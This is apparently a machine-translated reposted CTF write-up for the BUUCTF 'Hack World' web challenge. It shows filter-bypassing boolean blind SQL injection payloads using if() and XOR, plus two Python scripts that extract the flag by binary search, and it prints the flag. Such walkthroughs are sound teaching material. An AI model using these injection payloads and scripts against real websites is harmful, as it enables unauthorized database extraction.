当前位置：网站首页>[ciscn2019 North China Day2 web1]hack world --buuctf

[ciscn2019 North China Day2 web1]hack world --buuctf

2022-06-13 00:28:00 【Golden silk】

Catalog

analysis

The table name and field name prompt are given ,burpsuite Packet capture query point , On fuzz run , Look at the keywords filtered

The length is 482 All the packages have been filtered out , Very little filtering , But what? , When two keywords are entered, it is detected that SQL Inject , So this question is still combined filtering , No single quotation marks or # The combination of , Single quotation marks and ; The combination of , and (select) Not filtered out , This filters out many methods and whitespace , Spaces can be bypassed by parentheses , For details of bypassing ideas, please refer to

【 Technology sharing 】MySQL Inject attack and defense - Safe guest , Security information platform

Law 1

During the test, I found that it can be used if

if(1,1,2)

Blind note with Boolean , First try to disassemble the database name

if(ascii(substr((select(database())),1,1))>32,1,2)

The echo id by 1 The situation of , Explain that you can use , Guess the field directly

if(ascii(substr((select(flag)from(flag)),1,1))>32,1,2)

Explain that you can use , Then use dichotomy to write python Script

#buuctf web Hack World
import requests


url = "http://3bdb8fd8-acb8-4230-96d0-3845226525ba.node4.buuoj.cn:81/index.php"
flag = ""
i = 0


while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        mid = (letf+right) // 2
        payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
        data = {"id":payload} 
        res = requests.post(url=url, data=data).text
        if "Hello" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        flag += chr(letf)
        print(flag)
    else:
        break

Get it after running flag

flag{dda27733-1184-415d-8dba-5e9597491181}

Law two

Look at someone else's wp, There is also a way , Exclusive or operation , May refer to

MySQL Logical operators

So let's test that out , Inquire about 0 For the time being

Inquire about 1 For the time being

Can construct payload

0^(ascii(substr(database(),1,1))>0)

The echo

So write a script

#buuctf web Hack World
from turtle import right
import requests


url = "http://3bdb8fd8-acb8-4230-96d0-3845226525ba.node4.buuoj.cn:81/index.php"
flag = ""
i = 0


while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        mid = (letf+right) // 2
        payload = f"0^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})"
        data = {"id":payload}
        res = requests.post(url=url,data=data).text
        if "Hello" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        flag += chr(letf)
        print(flag)
    else:
        break

原网站

版权声明
本文为[Golden silk]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/164/202206130018276969.html